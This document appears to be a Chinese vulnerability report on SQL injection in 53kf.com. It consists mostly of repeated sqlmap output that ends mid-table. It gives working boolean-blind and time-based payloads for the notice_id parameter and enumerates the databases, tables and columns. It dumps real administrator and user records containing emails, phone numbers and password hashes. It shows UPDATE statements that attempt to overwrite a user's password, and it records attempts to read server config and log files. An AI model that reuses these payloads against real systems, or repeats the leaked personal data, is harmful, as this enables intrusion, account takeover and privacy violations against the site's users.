53kf.com的SQL严重注入漏洞
### 简要描述: 53kf.com的SQL严重注入漏洞导致主站及其多个分站数据库可以被脱裤,Mysql用户为Root,虽不能写文件,但是可以读文件,文件代码看光光~~由于找不到后台,暂时没拿到webshell,反正拿不拿shell估计都是20个Rank,所以懒得费劲了~ ### 详细说明: sqlmap identified the following injection points with a total of 57 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- available databases [18]: [*] 53kf_old [*] 53kfcs [*] en [*] en1 [*] entalk [*] information_schema [*] ip [*] ip5 [*] ip_bak [*] ip_new [*] mysql [*] passport [*] talk [*] test [*] ut [*] v5 [*] v5110110 [*] v5_old sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL...
### 简要描述: 53kf.com的SQL严重注入漏洞导致主站及其多个分站数据库可以被脱裤,Mysql用户为Root,虽不能写文件,但是可以读文件,文件代码看光光~~由于找不到后台,暂时没拿到webshell,反正拿不拿shell估计都是20个Rank,所以懒得费劲了~ ### 详细说明: sqlmap identified the following injection points with a total of 57 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- available databases [18]: [*] 53kf_old [*] 53kfcs [*] en [*] en1 [*] entalk [*] information_schema [*] ip [*] ip5 [*] ip_bak [*] ip_new [*] mysql [*] passport [*] talk [*] test [*] ut [*] v5 [*] v5110110 [*] v5_old sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- Database: 53kfcs [14 tables] +------------------+ | admin_oper | | admin_oper_bill | | cs_address | | cs_adv | | cs_category | | cs_company | | cs_company_bill | | cs_fav | | cs_index_product | | cs_mail | | cs_notice | | cs_order | | cs_product | | cs_same_product | +------------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- Database: v5 [52 tables] +---------------------+ | ad | | ad_count | | ad_show | | ad_show_js | | conf_ip1 | | cps_commission_log | | cps_user | | cps_user_account | | cps_user_logs | | cps_withdrawing_log | | daemonlog_recv | | daemonlog_send | | gggj_account | | gggj_accountHistory | | gggj_ad | | gggj_ad_old | | gggj_adstat | | gggj_config | | gggj_master_type | | gggj_master_user | | gggj_oper_log | | gggj_require | | gggj_solution | | gggj_spread | | gggj_stat | | gggj_user | | gggj_user_config | | id_record | | kf_tuo | | kf_tuo_test | | mailqueue | | official_adstat | | official_stat | | out_links | | out_links_message | | pub_cps | | sendemail_record | | user_infor | | user_infor_xx | | v5_admin_group | | v5_admin_oper | | v5_agent_bill | | v5_agent_oper | | v5_cate | | v5_company | | v5_company_account | | v5_company_bill | | v5_company_config | | v5_company_talk_log | | v5_worker | | web_ad_out_links | | web_user_url | +---------------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user: '1367' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.gggj_user: '225' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.v5_admin_oper: '3' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- Database: ut [85 tables] +--------------------------+ | access | | access_log | | account_switch | | agent_oper | | agent_style_lock | | announcement | | autoreply | | autoreply2 | | block_user | | chat_nation | | chat_net | | chat_place | | chat_search | | chat_worker | | com_talk | | com_talk_all_moved | | com_talk_bak | | com_talk_hnqyw | | com_talk_online | | company | | company_config | | company_config1 | | company_style | | company_talk | | company_yiyuan | | company_yiyuan2 | | conf_ip1 | | conf_ip1_old | | conf_sync | | config_id_remark | | config_value_remark | | cus_bill | | cus_group | | cus_link | | cus_mail | | cus_sms | | cus_theme | | cus_user | | customer | | customer2 | | cyy | | cyy_group | | err_infos | | face | | file | | imessage | | jiulong_log | | link | | logsql | | mail | | mail_template | | mailqueue | | message | | message2 | | module | | module2 | | robot | | robot_mem | | room_message | | sms_config | | sms_lword | | sql_sync | | stat | | stat_from | | stat_nation | | stat_place | | stat_search | | stat_to | | sys_notify | | talk_evalu | | talk_his | | talk_his_delete | | talk_his_read | | talk_id | | talk_subject | | talk_total | | talk_vote | | user | | user2 | | worker | | worker_config | | worker_group | | worker_online_log | | worker_online_log_detail | | worker_talk | +--------------------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select * from v5.v5_admin_oper [3]: [*] 18981795@qq.com, 605, 761, 0, , louwb, 1115adb0c8644ead44e6192dafb54f96b9d3bfdf, 13588816882, 18981795, , [*] tagaxi@gmail.com, 605, 762, 0, , wangys, 30c24dcd9266d646c92bb164d63cbb8b457ce6f8, 13858193074, 88579737, , [*] WILL@sina.com, 605, 763, 0, , xuxt, e01bc777acca079d1c41b47660583bc346bc526e, 111, 111, , sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- Database: talk [80 tables] +--------------------------+ | access | | access_log | | account_switch | | agent_oper | | agent_style_lock | | announcement | | area_kf | | autoreply | | block_user | | chat_nation | | chat_net | | chat_place | | chat_search | | chat_worker | | company | | company_ad | | company_config | | company_etel | | company_style | | conf_ip1 | | conf_ip1_old | | conf_sync | | config_id_remark | | config_value_remark | | cus_bill | | cus_group | | cus_link | | cus_mail | | cus_sms | | cus_theme | | cus_user | | customer | | cyy | | cyy_group | | err_infos | | etel_logo | | face | | file | | identity | | imessage | | jiulong_log | | link | | logo | | logsql | | mail_template | | mailqueue | | message | | module | | module_special | | robot | | robot_mem | | room_message | | sms_config | | sms_lword | | sql_sync | | stat | | stat_from | | stat_keyword_month | | stat_nation | | stat_place | | stat_search | | stat_to | | sys_notify | | talk_evalu | | talk_his | | talk_his_delete | | talk_his_read | | talk_id | | talk_subject | | talk_total | | talk_vote | | v5_company_config | | worker | | worker_config | | worker_group | | worker_online_log | | worker_online_log_detail | | zsk_category | | zsk_key | | zsk_question | +--------------------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- current database: 'v5' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select * from v5.cps_user where username='clzzy444':None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- Database: v5 Table: cps_user [13 columns] +-------------------+--------------+ | Column | Type | +-------------------+--------------+ | balance | float(10,2) | | cash_frozen_money | float(10,2) | | company_url | varchar(50) | | contact_name | varchar(50) | | cust_id | varchar(20) | | id | int(20) | | is_checked | tinyint(2) | | is_verified | tinyint(2) | | mobile | varchar(11) | | pwd | varchar(50) | | qq | varchar(11) | | reg_num | int(10) | | user_name | varchar(100) | +-------------------+--------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select * from v5.cps_user where user_name='clzzy444':None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select * from v5.cps_user where id='clzzy444':None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select * from v5.cps_user where qq='235623654' [1]: [*] 0.00, 0.00, http://www.ggggww.com, ?????????, clzzy444, 28024, 1, 1, 15829002900, my81trWOM1JpY, 235623654, 0, clzzy@qq.com sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user where balance>100: '7' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user where balance>1000: '0' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user where balance>500: '2' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user where cash_frozen_money>500: '0' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user where cash_frozen_money>100: '0' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user where cash_frozen_money>600: '0' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user where cash_frozen_money>550: '0' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user where balance>550: '2' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user where balance>650: '1' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select * from v5.cps_user where balance>550 [2]: [*] 600.00, 0.00, http://www.53kf.com, ?????????, 53kflify, 27811, 1, 0, 15727949427, mynK8lOObPeyY, 635731110, 63, lifangyuan7878@163.com [*] 700.00, 0.00, http://www.53kf.com, ??????, 53kfxupan, 27812, 1, 1, 13750928493, my8OmAlyld.yw, 2324347056, 38, yazixupan@163.com sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- update v5.cps_user set pwd='my81trWOM1JpY ' where user_name='lifangyuan7878@163.com':None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- update v5.cps_user set pwd='my81trWOM1JpY' where user_name='lifangyuan7878@163.com':None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- update v5.cps_user set pwd='my81trWOM1JpY' where user_name='lifangyuan7878@163.com':None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select * where user_name='lifangyuan7878@163.com':None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select pwd from v5.cps_user where user_name='lifangyuan7878@163.com' [1]: [*] mynK8lOObPeyY sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- database management system users privileges: [*] %% (administrator) [26]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: UPDATE privilege: USAGE [*] %root% (administrator) [25]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: UPDATE sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /apache/logs/error.log file saved to:None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /etc/httpd/logs/acces_log file saved to:None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /etc/httpd/conf/httpd.conf file saved to:None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /usr/local/apache/conf/httpd.conf file saved to:None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /var/www/html/apache/conf/httpd.conf file saved to:None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /var/www/html/apache/conf/httpd.conf file saved to:None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /home/httpd/conf/httpd.conf file saved to:None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- Database: v5 Table: cps_withdrawing_log [14 columns] +------------------------+------------------+ | Column | Type | +------------------------+------------------+ | account_user | varchar(20) | | audit_oper | varchar(20) | | audit_remark | text | | audit_time | datetime | | cust_id | varchar(20) | | id | int(20) | | io_remark | text | | money | float(10,2) | | status | varchar(30) | | withdrawing_account | varchar(50) | | withdrawing_audit_oper | varchar(20) | | withdrawing_remark | text | | withdrawing_time | datetime | | withdrawing_type | int(10) unsigned | +------------------------+------------------+ Database: v5 Table: ad [19 columns] +------------+--------------+ | Column | Type | +------------+--------------+ | ad_area | varchar(150) | | ad_content | varchar(255) | | ad_flag | tinyint(1) | | ad_type | varchar(2) | | ad_url | varchar(100) | | company_id | bigint(20) | | exp_day | date | | id | int(11) | | lang | varchar(5) | | money | float(10,2) | | oem | varchar(20) | | proxy | varchar(20) | | remark | mediumtext | | seller | varchar(20) | | start_day | date | | sys_flag | tinyint(1) | | t_day | datetime | | t_edit_day | date | | vip_order | int(10) | +------------+--------------+ Database: v5 Table: pub_cps [6 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | content | text | | id | int(20) | | pub_date | datetime | | pub_type | varchar(20) | | title | text | | url | varchar(50) | +----------+-------------+ Database: v5 Table: v5_company_account [10 columns] +--------------+------------------+ | Column | Type | +--------------+------------------+ | active_money | float(7,2) | | company_id | int(20) unsigned | | fee_date | date | | fee_money | int(10) | | fee_total | int(10) | | fix_money | float(7,2) | | fz_money | float(7,2) | | id | int(20) unsigned | | money | float(7,2) | | pre_total | int(20) | +--------------+------------------+ Database: v5 Table: kf_tuo_test [10 columns] +-----------+--------------+ | Column | Type | +-----------+--------------+ | ad_id | int(10) | | ad_type | varchar(10) | | area | varchar(100) | | arg | varchar(30) | | come_date | datetime | | come_ip | varchar(20) | | come_url | varchar(250) | | host | varchar(30) | | id | int(10) | | user_id | int(10) | +-----------+--------------+ Database: v5 Table: v5_admin_group [3 columns] +------------+-------------+ | Column | Type | +------------+-------------+ | id | int(11) | | name | varchar(50) | | permission | text | +------------+-------------+ Database: v5 Table: gggj_spread [8 columns] +-------------+---------------+ | Column | Type | +-------------+---------------+ | add_time | date | | admin_audit | enum('Y','N') | | end_time | date | | id | int(10) | | log | text | | money | varchar(10) | | wzz_audit | enum('Y','N') | | wzz_name | varchar(10) | +-------------+---------------+ Database: v5 Table: gggj_stat [10 columns] +-------------+-------------------+ | Column | Type | +-------------+-------------------+ | ad_date | date | | ad_from | tinyint(2) | | ad_id | int(11) | | ad_price | float | | Clearing | enum('Y','N','X') | | click | int(11) | | disp | int(11) | | domain_name | varchar(20) | | end_time | timestamp | | money_type | tinyint(2) | +-------------+-------------------+ Database: v5 Table: v5_admin_oper [11 columns] +-----------+------------------+ | Column | Type | +-----------+------------------+ | email | varchar(50) | | group_id | smallint(2) | | id | int(10) unsigned | | is_admin | tinyint(2) | | name | varchar(128) | | oper_name | varchar(20) | | oper_pwd | varchar(50) | | phone | varchar(15) | | qq | varchar(12) | | reg_date | datetime | | type | varchar(100) | +-----------+------------------+ Database: v5 Table: daemonlog_send [3 columns] +--------+----------+ | Column | Type | +--------+----------+ | action | char(16) | | sendid | char(20) | | stat | text | +--------+----------+ Database: v5 Table: daemonlog_recv [3 columns] +-------------+----------+ | Column | Type | +-------------+----------+ | action | char(16) | | last_recvid | char(20) | | stat | text | +-------------+----------+ Database: v5 Table: v5_cate [3 columns] +--------+------------------+ | Column | Type | +--------+------------------+ | id | int(20) unsigned | | name | varchar(40) | | pid | int(20) | +--------+------------------+ Database: v5 Table: out_links_message [4 columns] +-----------+--------------+ | Column | Type | +-----------+--------------+ | id | int(10) | | message | varchar(256) | | time | datetime | | user_name | varchar(25) | +-----------+--------------+ Database: v5 Table: gggj_solution [5 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | add_date | datetime | | add_user | int(10) | | content | text | | id | int(10) | | title | varchar(50) | +----------+-------------+ Database: v5 Table: official_stat [9 columns] +-------------+-------------------+ | Column | Type | +-------------+-------------------+ | ad_date | date | | ad_from | tinyint(2) | | ad_id | int(11) | | ad_price | float | | Clearing | enum('Y','N','X') | | click | int(11) | | disp | int(11) | | domain_name | varchar(20) | | money_type | tinyint(2) | +-------------+-------------------+ Database: v5 Table: gggj_oper_log [5 columns] +-----------+-------------+ | Column | Type | +-----------+-------------+ | id | int(11) | | log | text | | oper_time | datetime | | type | varchar(10) | | user_id | varchar(20) | +-----------+-------------+ Database: v5 Table: cps_user_logs [8 columns] +----------------+--------------+ | Column | Type | +----------------+--------------+ | after_content | varchar(255) | | before_content | varchar(255) | | classname | varchar(30) | | createtime | datetime | | logs_id | int(11) | | oper_name | varchar(30) | | operating | varchar(30) | | sqlstr | text | +----------------+--------------+ Database: v5 Table: gggj_user [7 columns] +-------------+--------------+ | Column | Type | +-------------+--------------+ | accountCode | varchar(50) | | add_time | date | | domain_name | varchar(20) | | gggj_type | varchar(10) | | id | int(11) | | industry | varchar(5) | | remark | varchar(255) | +-------------+--------------+ Database: v5 Table: v5_company [51 columns] +---------------------+------------------+ | Column | Type | +---------------------+------------------+ | add_time | datetime | | address | varchar(255) | | admin_flag | tinyint(1) | | chat_num | int(10) | | chat_num_last | int(10) | | chat_num_last_total | int(10) | | city | varchar(50) | | comm_num | int(10) | | company_id | int(10) unsigned | | domain_name | varchar(20) | | email | varchar(50) | | fax | varchar(20) | | free_click | int(10) | | friend_links | int(10) | | hot_num | int(10) | | indus | varchar(50) | | key_word | varchar(60) | | kf_bind | tinyint(2) | | kf_id | varchar(30) | | kf_type | tinyint(3) | | last_login | datetime | | linkman | varchar(25) | | logo | varchar(25) | | method | tinyint(1) | | method_nnet | tinyint(1) | | name | varchar(255) | | net_reg | tinyint(1) | | notes | text | | online | bigint(20) | | order_flag | tinyint(1) | | paim | float | | phone | varchar(40) | | province | varchar(50) | | proxy | varchar(50) | | qq | varchar(50) | | real_proxy | varchar(50) | | reg_from | varchar(4) | | search | varchar(255) | | sell_name | varchar(20) | | sell_stat | tinyint(2) | | short_name | varchar(255) | | show_flag | tinyint(2) | | t_date | float(10,2) | | t_today | date | | t_total | float(10,2) | | talk_area | varchar(150) | | talk_etime | tinyint(10) | | talk_stime | tinyint(10) | | talk_url | varchar(100) | | url | varchar(50) | | vip_order | int(11) | +---------------------+------------------+ Database: v5 Table: v5_agent_bill [8 columns] +----------+---------------------+ | Column | Type | +----------+---------------------+ | agent_id | int(11) | | balance | float(7,2) unsigned | | id | int(10) unsigned | | io_time | datetime | | io_type | int(10) unsigned | | money | float unsigned | | orderid | varchar(20) | | reason | text | +----------+---------------------+ Database: v5 Table: v5_company_bill [13 columns] +-------------+------------------+ | Column | Type | +-------------+------------------+ | company_id | int(20) | | date | datetime | | id | int(20) unsigned | | ip | varchar(50) | | istalk | tinyint(1) | | money | float(7,2) | | old_comid | bigint(20) | | orderid | varchar(20) | | pay_way | varchar(20) | | person_name | varchar(100) | | remark | text | | src | varchar(20) | | type | tinyint(2) | +-------------+------------------+ Database: v5 Table: gggj_ad [15 columns] +-------------+-------------------+ | Column | Type | +-------------+-------------------+ | ad_code | text | | ad_content | varchar(50) | | ad_name | varchar(50) | | ad_price | float | | ad_url | text | | 